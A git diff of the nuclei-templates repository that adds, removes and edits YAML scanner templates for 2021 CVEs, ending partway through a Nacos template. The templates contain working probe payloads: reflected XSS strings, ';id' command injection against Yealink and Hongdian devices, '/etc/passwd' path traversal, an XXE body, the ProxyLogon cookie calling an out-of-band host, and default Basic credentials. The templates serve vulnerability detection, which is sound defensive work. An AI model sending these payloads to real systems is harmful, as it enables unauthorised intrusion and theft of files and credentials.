b/nuclei-templates/CVE-2021/CVE-2021-26598.yaml @@ -0,0 +1,57 @@ +id: CVE-2021-26598 + +info: + name: ImpressCMS - Incorrect Authorization + author: gy741,pdteam + severity: medium + description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). + reference: + - https://hackerone.com/reports/1081137 + - http://karmainsecurity.com/KIS-2022-03 + - https://github.com/ImpressCMS + - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-26598 + cwe-id: CWE-287 + metadata: + shodan-query: http.html:"ImpressCMS" + tags: cve,cve2021,impresscms,unauth,cms + +requests: + - raw: + - | + GET /misc.php?action=showpopups&type=friend HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + + - | + GET /include/findusers.php?token={{token}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - 'last_login' + - 'user_regdate' + - 'uname' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: token + internal: true + group: 1 + regex: + - "REQUEST' value='(.*?)'" + - 'REQUEST" value="(.*?)"' diff --git a/nuclei-templates/CVE-2021/CVE-2021-26702.yaml b/nuclei-templates/CVE-2021/CVE-2021-26702.yaml deleted file mode 100644 index 67a641543d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-26702.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2021-26702 -info: - name: EPrints 3.4.2 XSS - author: ritikchaddha - severity: medium - description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset parameter to a cgi/dataset_ dictionary URI. - reference: - - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf - - https://files.eprints.org/2548/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-26702 - cwe-id: CWE-79 - tags: cve,cve2021,xss,eprints -requests: - - method: GET - path: - - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-26812.yaml b/nuclei-templates/CVE-2021/CVE-2021-26812.yaml new file mode 100644 index 0000000000..e5378cec02 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26812.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-26812 + +info: + name: Moodle jitsi plugin XSS + author: aceseven (digisec360) + severity: medium + description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can + inject javascript code to be run by the application. + reference: + - https://github.com/udima-university/moodle-mod_jitsi/issues/67 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-26812 + cwe-id: CWE-79 + tags: cve,cve2021,moodle,jitsi,xss,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert(document.domain);" + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "MoodleSession" diff --git a/nuclei-templates/CVE-2021/CVE-2021-26855.yaml b/nuclei-templates/CVE-2021/CVE-2021-26855.yaml deleted file mode 100644 index ae5e857ac7..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-26855.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2021-26855 - -info: - name: Microsoft Exchange Server SSRF Vulnerability - author: madrobot - severity: critical - description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. - reference: - - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855 - - https://proxylogon.com/#timeline - - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 - remediation: Apply the appropriate security update. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-26855 - tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft - -requests: - - raw: - - | - GET /owa/auth/x.js HTTP/1.1 - Host: {{Hostname}} - Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3; - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/02/04 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27132.yaml b/nuclei-templates/CVE-2021/CVE-2021-27132.yaml deleted file mode 100644 index 7f46e618ad..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27132.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-27132 - -info: - name: Sercomm VD625 Smart Modems - CRLF Injection - author: geeknik - severity: critical - description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header. - reference: - - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 - - http://sercomm.com - - https://nvd.nist.gov/vuln/detail/CVE-2021-27132 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-27132 - cwe-id: CWE-74 - tags: cve,cve2021,crlf,injection - -requests: - - method: GET - path: - - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" - - matchers-condition: and - matchers: - - type: status - status: - - 404 - part: header - - - type: word - words: - - "Content-Disposition: attachment;filename=test.txt" - - "Set-Cookie:CRLFInjection=Test" - - "Location: example.com" - - "X-XSS-Protection:0" - part: header - condition: and - -# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27309.yaml b/nuclei-templates/CVE-2021/CVE-2021-27309.yaml new file mode 100644 index 0000000000..9c1806567b --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-27309.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-27309 +info: + name: Clansphere CMS 2011.4 - Reflected XSS + author: edoardottt + severity: medium + description: | + Clansphere CMS 2011.4 allows unauthenticated reflected XSS via "module" parameter. + reference: + - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-27309 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-27309 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2021,clansphere,xss,cms,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22>" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">.php' + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-27310.yaml b/nuclei-templates/CVE-2021/CVE-2021-27310.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27310.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27310.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-27358.yaml b/nuclei-templates/CVE-2021/CVE-2021-27358.yaml deleted file mode 100644 index 3eed4dd72d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27358.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-27358 - -info: - name: Grafana Unauthenticated Snapshot Creation - author: pdteam,bing0o - severity: high - description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set. - reference: - - https://phabricator.wikimedia.org/T274736 - - https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-27358 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2021-27358 - cwe-id: CWE-306 - tags: cve,cve2021,grafana,unauth - -requests: - - raw: - - | - POST /api/snapshots HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} - - matchers-condition: and - matchers: - - part: body - type: word - words: - - '"deleteUrl":' - - '"deleteKey":' - condition: and - - - type: word - part: header - words: - - "application/json" - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27561.yaml b/nuclei-templates/CVE-2021/CVE-2021-27561.yaml deleted file mode 100644 index b448188200..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27561.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2021-27561 - -info: - name: YeaLink DM 3.6.0.20 - Remote Command Injection - author: shifacyclewala,hackergautam - severity: critical - description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication. - reference: - - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561 - - https://ssd-disclosure.com/?p=4688 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-27561 - cwe-id: CWE-77 - tags: cve,cve2021,rce,yealink,mirai - -requests: - - method: GET - path: - - "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;" - - matchers-condition: and - matchers: - - type: word - condition: and - part: body - words: - - 'uid' - - 'gid' - - 'groups' - - - type: word - part: header - words: - - 'application/json' - - - type: status - status: - - 200 - - extractors: - - type: regex - regex: - - "(u|g)id=.*" - -# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/cve-2021-27651.yaml b/nuclei-templates/CVE-2021/CVE-2021-27651.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27651.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27651.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-27850.yaml b/nuclei-templates/CVE-2021/CVE-2021-27850.yaml index 913394f5e4..44b1b651c3 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27850.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27850.yaml @@ -1,22 +1,19 @@ id: CVE-2021-27850 info: - name: Apache Tapestry - Remote Code Execution + name: Apache Tapestry - Arbitrary class download + description: | + A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. author: pdteam severity: critical - description: | - Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 - - https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E - - http://www.openwall.com/lists/oss-security/2021/04/15/1 - - https://security.netapp.com/advisory/ntap-20210528-0002/ + tags: cve,cve2021,apache,tapestry classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-27850 cwe-id: CWE-502 - tags: cve,cve2021,apache,tapestry requests: - raw: @@ -56,5 +53,3 @@ requests: - 'webtools' part: body condition: and - -# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27931.yaml b/nuclei-templates/CVE-2021/CVE-2021-27931.yaml deleted file mode 100644 index a426c5d084..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27931.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-27931 - -info: - name: LumisXP <10.0.0 - Blind XML External Entity Attack - author: alph4byt3 - severity: critical - description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service. - reference: - - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt - - https://nvd.nist.gov/vuln/detail/CVE-2021-27931 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H - cvss-score: 9.1 - cve-id: CVE-2021-27931 - cwe-id: CWE-611 - tags: cve,cve2021,lumis,xxe,oast,blind - -requests: - - raw: - - | - POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1 - Host: {{Hostname}} - - - - - ]> - - &xxe; - - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28149.yaml b/nuclei-templates/CVE-2021/CVE-2021-28149.yaml index 9a8a2cc332..5529e9a825 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-28149.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-28149.yaml @@ -9,13 +9,12 @@ info: reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 - - http://en.hongdian.com/Products/Details/H8922 + tags: cve,cve2021,hongdian,traversal classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 + cvss-score: 6.50 cve-id: CVE-2021-28149 cwe-id: CWE-22 - tags: cve,cve2021,hongdian,traversal requests: - raw: @@ -30,6 +29,7 @@ requests: Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= + matchers-condition: and matchers: - type: status diff --git a/nuclei-templates/CVE-2021/CVE-2021-28150.yaml b/nuclei-templates/CVE-2021/CVE-2021-28150.yaml index 8c9d76f47e..0970614363 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-28150.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-28150.yaml @@ -8,13 +8,12 @@ info: reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 - - http://en.hongdian.com/Products/Details/H8922 + tags: cve,cve2021,hongdian,exposure classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 + cvss-score: 5.50 cve-id: CVE-2021-28150 cwe-id: CWE-20 - tags: cve,cve2021,hongdian,exposure requests: - raw: diff --git a/nuclei-templates/CVE-2021/CVE-2021-28151.yaml b/nuclei-templates/CVE-2021/CVE-2021-28151.yaml new file mode 100644 index 0000000000..9a57731f21 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-28151.yaml @@ -0,0 +1,57 @@ +id: CVE-2021-28151 + +info: + name: Hongdian Command Injection + author: gy741 + severity: high + description: | + Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. + reference: + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 + - http://en.hongdian.com/Products/Details/H8922 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-28151 + cwe-id: CWE-78 + tags: cve,cve2021,hongdian,rce,injection + +requests: + - raw: + - | + POST /tools.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + Origin: {{BaseURL}} + Referer: {{BaseURL}}/tools.cgi + + op_type=ping&destination=%3Bid + + - | + POST /tools.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46YWRtaW4= + Origin: {{BaseURL}} + Referer: {{BaseURL}}/tools.cgi + + op_type=ping&destination=%3Bid + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + part: body + condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-28169.yaml b/nuclei-templates/CVE-2021/CVE-2021-28169.yaml deleted file mode 100644 index e5cb2e4d5f..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-28169.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2021-28169 - -info: - name: Jetty Utility Servlets Information Disclosure - author: pikpikcu - severity: medium - description: | - For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. - reference: - - https://twitter.com/sec715/status/1406787963569065988 - - https://nvd.nist.gov/vuln/detail/CVE-2021-28169 - - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq - - https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-28169 - cwe-id: CWE-200 - tags: cve,cve2021,jetty - -requests: - - method: GET - path: - - "{{BaseURL}}/static?/%2557EB-INF/web.xml" - - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" - - matchers-condition: and - matchers: - - - type: word - words: - - "application/xml" - part: header - - - type: word - words: - - "" - - "java.sun.com" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml b/nuclei-templates/CVE-2021/CVE-2021-28377.yaml deleted file mode 100644 index d55e6fcef0..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2021-28377 -info: - name: ChronoForums 2.0.11 - Directory Traversal - author: 0x_Akoko - severity: medium - description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, for example the Joomla! configuration file which contains credentials. - reference: - - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-28377 - cwe-id: CWE-22 - tags: cve,cve2021,chronoforums,lfi,joomla -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28854.yaml b/nuclei-templates/CVE-2021/CVE-2021-28854.yaml deleted file mode 100644 index efc44976c4..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-28854.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-28854 - -info: - name: VICIdial Sensitive Information Disclosure - author: pdteam - severity: high - description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug - information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial - systems. - reference: - - https://github.com/JHHAX/VICIdial - classification: - cve-id: CVE-2021-28854 - tags: cve,cve2021 - -requests: - - method: GET - path: - - "{{BaseURL}}/agc/vicidial_mysqli_errors.txt" - - matchers-condition: and - matchers: - - type: word - words: - - 'text/plain' - part: header - - - type: status - status: - - 200 - - - type: word - words: - - 'vdc_db_query' - part: body - -# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28918.yaml b/nuclei-templates/CVE-2021/CVE-2021-28918.yaml deleted file mode 100644 index 556bc8721f..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-28918.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2021-28918 - -info: - name: Netmask NPM Package - Server-Side Request Forgery - author: johnjhacking - severity: critical - description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. - reference: - - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - - https://github.com/advisories/GHSA-pch5-whg9-qr2r - - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - - https://github.com/rs/node-netmask - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 - cve-id: CVE-2021-28918 - cwe-id: CWE-20 - tags: cve,cve2021,npm,netmask,ssrf,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - "Apache Server Status" - - "Server Version" - condition: and - - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28937.yaml b/nuclei-templates/CVE-2021/CVE-2021-28937.yaml new file mode 100644 index 0000000000..afb05c10f6 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-28937.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-28937 + +info: + name: Acexy Wireless-N WiFi Repeater Password Disclosure + author: geeknik + severity: high + description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext. + reference: + - https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 + - http://acexy.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-28937 + cwe-id: CWE-312 + tags: cve,cve2021,acexy,disclosure,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/password.html" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Password Setting" + - "addCfg('username'" + - "addCfg('newpass'" + condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-29156.yaml b/nuclei-templates/CVE-2021/CVE-2021-29156.yaml new file mode 100644 index 0000000000..a0eca05bbc --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-29156.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-29156 + +info: + name: LDAP Injection In OpenAM + author: melbadry9,xelkomy + severity: high + description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval. + reference: + - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md https://hackerone.com/reports/1278050 https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/ https://portswigger.net/research/hidden-oauth-attack-vectors + - https://portswigger.net/research/hidden-oauth-attack-vectors + - https://bugster.forgerock.org/jira/browse/OPENAM-10135 + remediation: Upgrade to OpenAM commercial version 13.5.1 or later. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-29156 + cwe-id: CWE-74 + tags: cve,cve2021,openam,ldap,injection + +requests: + - method: GET + path: + - "{{BaseURL}}/openam/ui/PWResetUserValidation" + - "{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation" + - "{{BaseURL}}/ui/PWResetUserValidation" + + matchers: + - type: dsl + dsl: + - 'contains(body, "jato.pageSession") && status_code==200' + +# Enhanced by cs on 2022/01/24 diff --git a/nuclei-templates/CVE-2021/CVE-2021-29203.yaml b/nuclei-templates/CVE-2021/CVE-2021-29203.yaml deleted file mode 100644 index 2189884675..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-29203.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2021-29203 - -info: - name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass - author: madrobot - severity: critical - description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. - reference: - - https://www.tenable.com/security/research/tra-2021-15 - - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 - - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-29203 - cwe-id: CWE-287 - tags: hpe,cve,cve2021,bypass - -requests: - - raw: - - | - PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/json - - {"Password":"{{randstr}}"} - - - | - POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"UserName":"Administrator","Password":"{{randstr}}"} - - matchers-condition: and - matchers: - - - type: status - status: - - 201 - - - type: word - condition: and - part: header - words: - - "X-Auth-Token" - - "PasswordReset" - - "Location" - - - type: word - part: body - words: - - "Base.1.0.Created" - -# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/CVE-2021-29442.yaml b/nuclei-templates/CVE-2021/CVE-2021-29442.yaml new file mode 100644 index 0000000000..9f495334b8 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-29442.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-29442 + +info: + name: Nacos prior to 1.4.1 Missing Authentication Check + author: dwisiswant0 + severity: high + description: | + In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. + While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. + These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql) + reference: + - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ + - https://github.com/alibaba/nacos/issues/4463 + - https://github.com/alibaba/nacos/pull/4517 + - https://github.com/advisories/GHSA-36hp-jr8h-556f + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-29442 + cwe-id: CWE-306 + tags: nacos,auth-bypass,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header + - type: regex + regex: + - 